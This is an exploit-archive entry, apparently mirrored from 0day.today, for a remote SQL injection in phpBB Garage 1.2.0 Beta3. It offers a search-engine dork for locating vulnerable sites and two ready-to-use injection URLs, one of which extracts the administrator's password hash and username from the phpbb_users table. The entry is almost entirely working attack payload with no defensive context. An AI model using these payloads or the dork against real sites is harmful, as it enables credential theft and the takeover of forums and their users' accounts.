id: 2336
date: 12/03/2007
title: phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability
author: maku234
cves: 

===========================================================
phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability
===========================================================



Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork:  "Powered By phpBB Garage 1.2.0"

Author:  maku234



garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*



#  0day.today [2023-03-27]  #